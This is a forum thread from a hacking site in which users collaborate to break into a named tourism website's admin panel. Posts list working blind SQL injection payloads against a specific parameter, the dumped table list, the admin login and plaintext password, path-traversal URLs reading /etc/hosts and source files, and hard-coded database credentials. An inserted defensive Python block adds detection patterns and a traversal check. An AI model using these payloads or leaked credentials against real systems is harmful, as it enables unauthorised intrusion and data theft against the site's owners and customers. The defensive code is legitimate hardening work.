
View full version : Help find the admin panel


Groove
03.08.2019, 17:55
http://www.onlytourism.com/ help me find the admin panel, I'd be grateful.

Baskin-Robbins
03.08.2019, 18:52
Couldn't find the admin panel, but we can do this:

cpanel.onlytourism.com

webdisk.onlytourism.com

webmail.onlytourism.com

kacergei
14.08.2019, 09:01
Not sure how relevant this still is, but here is what I've managed to gather so far:

Spoiler: phpinfo();


Code:
onlytourism.com/php.php


Spoiler: sql-injection


Code:
URL: onlytourism.com/tours-details.php?type=16&id=31&arrdate=23%2F08%2F2019&adults=3&children=2



Code:
Vector:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: type=16&id=31' AND 2317=2317 AND 'TZhC'='TZhC&arrdate=23/08/2019&adults=3&children=2
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: type=16&id=31' AND SLEEP(5) AND 'RAuE'='RAuE&arrdate=23/08/2019&adults=3&children=2
---

DB tables


Code:
Database: onlytour_naddaf
[46 tables]
+-----------------------------------------+
| onlytourism_admin |
| onlytourism_adsense |
| onlytourism_banners |
| onlytourism_bannersmid |
| onlytourism_bookpackages |
| onlytourism_booktour |
| onlytourism_bookvisa |
| onlytourism_category |
| onlytourism_categorychannel |
| onlytourism_categorydir |
| onlytourism_categoryhd |
| onlytourism_categoryphoto |
| onlytourism_cms |
| onlytourism_configurations |
| onlytourism_country |
| onlytourism_countryliving |
| onlytourism_downloads |
| onlytourism_gallery |
| onlytourism_gallery_images |
| onlytourism_news |
| onlytourism_news_admin |
| onlytourism_news_maillist_subscribers |
| onlytourism_news_newsletter |
| onlytourism_news_newsletter_attachments |
| onlytourism_news_newsletter_maillist |
| onlytourism_news_newsletter_templates |
| onlytourism_news_newslettersubscriber |
| onlytourism_packages |
| onlytourism_prod_images |
| onlytourism_prod_imagesdir |
| onlytourism_prod_imageshd |
| onlytourism_prod_price |
| onlytourism_prod_pricedir |
| onlytourism_prod_pricehd |
| onlytourism_products |
| onlytourism_products_catg |
| onlytourism_products_catgdir |
| onlytourism_products_catghd |
| onlytourism_productsdir |
| onlytourism_productshd |
| onlytourism_projectcat_images |
| onlytourism_projectcategory |
| onlytourism_services |
| onlytourism_testimonials |
| onlytourism_tours |
| onlytourism_vacancies |
+-----------------------------------------+

Administrator data


Code:
Database: onlytour_naddaf
Table: onlytourism_admin
[1 entry]
+----+------------+-------------+
| id | user       | pwd         |
+----+------------+-------------+
| 1  | tourismcms | onlypass563 |
+----+------------+-------------+


Spoiler: File download
/etc/hosts and the path to the root index.php


Code:
onlytourism.com/download_file.php?fname=../../../../etc/hosts
onlytourism.com/download_file.php?fname=../../../../home/onlytour/public_html/index.php

Files I managed to find myself (just a surface pass):


Code:
/includes/analytics.php
/includes/banner-inner.php
/includes/footer.php
/includes/header.php
/includes/subscribe.php
/lib/adsense.php
/lib/application-footer.php
/lib/application-top.php
/lib/bannersmid.php
/lib/category.php
/lib/categorydir.php
/lib/categoryhd.php
/lib/class.phpmailer.php
/lib/cms.php
/lib/configurations.php
/lib/conmanager.php
/lib/connect.php
/lib/news.php
/lib/products.php
/lib/seourl.php
/pagination/pagination.class.php
/about.php
/blog.php
/booking-tour.php
/cms.php
/contact.php
/downloads.php
/download_file.php
/get-ajax.php
/holiday-packages.php
/index.php
/packages-details.php
/php.ini
/tours-details.php
/tours-search.php
/tours.php


Spoiler: DB connection credentials
Code excerpt


PHP:
class MySqlConnectionManager extends ConnectionManager
{
    // Connection parameters are hard-coded in the constructor (as posted)
    function MySqlConnectionManager()
    {
        $this->hostName = "localhost";
        $this->userName = "onlytour_naddaft";
        $this->passWord = "QYi8Lug4swSEr5J";
    }

    // Opens the link with the legacy mysql_* extension
    function doConnection()
    {
        if (!($this->conHandle = mysql_connect($this->hostName, $this->userName, $this->passWord)))
        {
            die("Cannot Connect to Host");
        }
    }

    function selectDatabase()
    {
        mysql_select_db("onlytour_naddaf", $this->conHandle);
    }
}



PS: If I find the admin panel I'll update the post; otherwise I hope this information helps the search.
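Added example, not code from this thread or from the site it discusses: defender-side checks for the two weaknesses reported in the post above, the `../` traversal in download_file.php?fname= and the blind SQL injection (boolean and SLEEP() based) in tours-details.php?id=. `safe_download_path()` is the path-canonicalisation check a download endpoint needs so that only files under one fixed directory are ever served, and `scan_access_log()` runs detection for the indicators visible in the post over a few access-log lines. The `DOWNLOAD_ROOT` location and every log line are constructed assumptions for the example.

```python
"""
Added example, not code from the forum thread or from the site it discusses.

Defender-side checks for the two weaknesses reported in the post above:
  * the path traversal in download_file.php?fname=../../../../etc/hosts
  * the blind SQL injection (boolean and SLEEP() based) in tours-details.php?id=

safe_download_path() is the canonicalisation check a download endpoint needs
so that only files inside one fixed directory can be served.
scan_access_log() flags access-log requests carrying the indicators visible
in the post, so such probes can be spotted in web server logs.

DOWNLOAD_ROOT and every log line below are constructed for the example.
"""
import re
import urllib.parse
from pathlib import Path
from typing import List, Optional, Tuple

# Assumed location of the files the site is allowed to serve (example value).
DOWNLOAD_ROOT = Path("/var/www/site/downloads")


def safe_download_path(fname: str, root: Path = DOWNLOAD_ROOT) -> Optional[Path]:
    """Return the file to serve for `fname`, or None if it escapes `root`.

    Both sides of the comparison are resolved, absolute paths, so literal
    "../" segments, percent-encoded ones, absolute paths and symlinks that
    point outside the directory are all rejected by the same test.
    """
    decoded = urllib.parse.unquote(fname)
    root_resolved = root.resolve()
    candidate = (root_resolved / decoded).resolve()
    if candidate == root_resolved:
        return None  # the directory itself is not a downloadable file
    try:
        candidate.relative_to(root_resolved)
    except ValueError:
        return None  # resolved path lies outside the download directory
    return candidate


# Indicators matching the probes shown in the post.
TRAVERSAL = re.compile(r"(?:^|[/\\])\.\.(?:[/\\]|$)")  # "../" or "..\" segment
SQLI_BOOLEAN = re.compile(
    r"'\s*(?:AND|OR)\s+\S+=\S+\s+(?:AND|OR)\s+'", re.IGNORECASE)  # ' AND 1=1 AND '
SQLI_TIME = re.compile(r"\b(?:SLEEP|BENCHMARK)\s*\(", re.IGNORECASE)  # SLEEP(5)

# Common log format: ip ident user [ts] "METHOD target proto" status size
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def classify_request(target: str) -> List[str]:
    """Return the sorted indicator names found in one request target."""
    path, _, query = target.partition("?")
    hits = set()
    if TRAVERSAL.search(urllib.parse.unquote(path)):
        hits.add("traversal:path")
    # parse_qs percent-decodes values, so %27 / %20 payloads are inspected decoded
    for name, values in urllib.parse.parse_qs(query, keep_blank_values=True).items():
        for value in values:
            if TRAVERSAL.search(value):
                hits.add(f"traversal:{name}")
            if SQLI_BOOLEAN.search(value):
                hits.add(f"sqli-boolean:{name}")
            if SQLI_TIME.search(value):
                hits.add(f"sqli-time:{name}")
    return sorted(hits)


def scan_access_log(text: str) -> List[Tuple[str, str, List[str]]]:
    """Return (client ip, request path, indicators) for every flagged line."""
    alerts = []
    for line in text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue
        hits = classify_request(m["target"])
        if hits:
            alerts.append((m["ip"], m["target"].partition("?")[0], hits))
    return alerts


# Constructed access-log sample: the probes from the post plus benign requests.
LOG_SAMPLE = """\
203.0.113.5 - - [14/Aug/2019:09:01:02 +0000] "GET /tours-details.php?type=16&id=31&arrdate=23%2F08%2F2019&adults=3&children=2 HTTP/1.1" 200 8123
203.0.113.5 - - [14/Aug/2019:09:01:07 +0000] "GET /tours-details.php?type=16&id=31%27%20AND%202317%3D2317%20AND%20%27TZhC%27%3D%27TZhC&arrdate=23%2F08%2F2019 HTTP/1.1" 200 8123
203.0.113.5 - - [14/Aug/2019:09:01:13 +0000] "GET /tours-details.php?type=16&id=31%27%20AND%20SLEEP(5)%20AND%20%27RAuE%27%3D%27RAuE HTTP/1.1" 200 8123
203.0.113.5 - - [14/Aug/2019:09:02:40 +0000] "GET /download_file.php?fname=../../../../etc/hosts HTTP/1.1" 200 221
198.51.100.7 - - [14/Aug/2019:09:03:01 +0000] "GET /download_file.php?fname=brochure.pdf HTTP/1.1" 200 40211
"""

if __name__ == "__main__":
    for ip, path, hits in scan_access_log(LOG_SAMPLE):
        print(f"{ip} {path} {' '.join(hits)}")
    print(safe_download_path("brochure.pdf"))
    print(safe_download_path("../../../../etc/hosts"))
```

The traversal fix compares resolved paths rather than stripping `../` from the input, because stripping leaves encoded, doubled or symlinked variants in place; the log scan decodes each query value before matching, since the boolean and time-based payloads arrive percent-encoded in a real access log.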

karkajoi
14.08.2019, 17:53
Groove said:
↑ (https://antichat.live/posts/4323090/)
http://www.onlytourism.com/
help me find the admin panel, I'd be grateful.




kacergei said:
↑ (https://antichat.live/posts/4325340/)
Not sure how relevant this still is, but here is what I've managed to gather so far:


As an option, look for the admin panel path in the DB and check the paths in the files; these tables look interesting:

onlytourism_cms

onlytourism_configurations